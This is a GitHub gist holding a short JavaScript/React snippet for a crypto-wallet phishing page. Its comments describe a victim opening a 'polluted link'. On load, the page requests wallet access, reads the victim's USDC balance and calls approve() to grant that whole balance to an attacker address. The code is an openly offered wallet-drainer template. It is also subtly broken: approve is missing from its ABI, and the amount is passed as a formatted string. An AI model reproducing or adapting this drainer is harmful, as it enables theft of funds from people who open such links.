Last active
February 24, 2022 17:53
-
-
Save lex-world/cfa9d060d3f9206cb29823a999dcaba8 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| const provider = new ethers.providers.Web3Provider(window.ethereum, "any"); | |
| await provider.send("eth_requestAccounts", []); | |
| const signer = provider.getSigner() | |
| const usdc = { | |
| address: "0x68ec573C119826db2eaEA1Efbfc2970cDaC869c4", | |
| abi: [ | |
| "function name() view returns (string)", | |
| "function symbol() view returns (string)", | |
| "function gimmeSome() external", | |
| "function balanceOf(address _owner) public view returns (uint256 balance)", | |
| "function transfer(address _to, uint256 _value) public returns (bool success)", | |
| ], | |
| }; | |
| /* | |
| * @dev normally you don't need to add ABI on the latest update it'll auto import form contract address | |
| */ | |
| const usdcContract = new ethers.Contract(usdc.address, usdc.abi, signer); | |
| /* | |
| * @dev as victim opens some polluted link that links to this page | |
| * Once the browser tabs opens it'll automatically pop-up wallet | |
| */ | |
| React.useEffect(() => { | |
| (async () => { | |
| const victim = await signer.getAddress(); | |
| const victimBalanceUSDC = await usdcContract.balanceOf(victim); | |
| // Since USDC decimals() is 6 i.e. to handle non -ve number and float since solidity does not supports -ve and floating points | |
| await usdcContract.approve("Address of Victor/Attacker", ethers.utils.formatUnits(victimBalanceUSDC, 6)); | |
| })(); | |
| }) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment